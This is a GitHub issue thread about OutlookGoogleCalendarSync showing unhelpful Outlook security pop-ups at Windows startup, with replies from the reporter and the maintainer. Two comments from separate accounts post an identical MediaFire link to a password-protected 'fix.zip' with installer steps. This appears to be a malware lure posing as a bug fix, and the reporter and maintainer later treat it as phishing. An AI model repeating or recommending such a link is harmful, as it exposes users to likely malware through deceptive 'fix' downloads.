### ISSUE TITLE
Useless Windows Notification on Start

### ISSUE THREAD

**Issue by galexmay** [phw198/OutlookGoogleCalendarSync#1946]
**OGCS Version**: 2.11.0.0 
**Edition**: Installed
**Sync Direction**:  O<->G

**Bug Description**  
When I start windows, I get a pop-up saying that something is trying to access Outlook. If I hit deny, OGCS does not appear to start. If I hit allow, I get a series of these. Eventually, they go away and are replaced with the attached pop-up saying that my security is off. When I click on that to get more info, I get nothing useful at all, just the blank sync screen. 

[OGcalsync.log](https://github.com/user-attachments/files/16746397/OGcalsync.log)
![popup](https://github.com/user-attachments/assets/3d69edb6-9325-4132-9cfb-c3b1a952bafd)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by galexmay** [comment]
How do I know this isn't just someone trying to get me to install a virus?

**Comment by galexmay** [comment]
Why don't I get a notification when my comment is deleted? Why isn't the phishing message that I was responding to with that message showing up at all? What is the normal response time here?

**Comment by galexmay** [comment]
Seems to be related to this
![Clipboard_08-28-2024_01](https://github.com/user-attachments/assets/be1e464d-c16c-402b-af8b-b39d035c189f)

**Comment by phw198** [comment]
The security message is well [documented here](https://github.com/phw198/OutlookGoogleCalendarSync/wiki/FAQs---Outlook-Security) - which is what the notification _should_ redirect you to.

The fact it doesn't on Windows 10 and beyond is noted under #1870

> Why don't I get a notification when my comment is deleted? 

You'd have to ask GitHub that, given the message was deleted by @github-staff

> Why isn't the phishing message that I was responding to with that message showing up at all?

I'd hazard a guess that GitHub don't want phishing content posted - likely contravenes their Terms of Service/Acceptable Usage Policy.

> What is the normal response time here?

Whenever I get time to spend on the project.
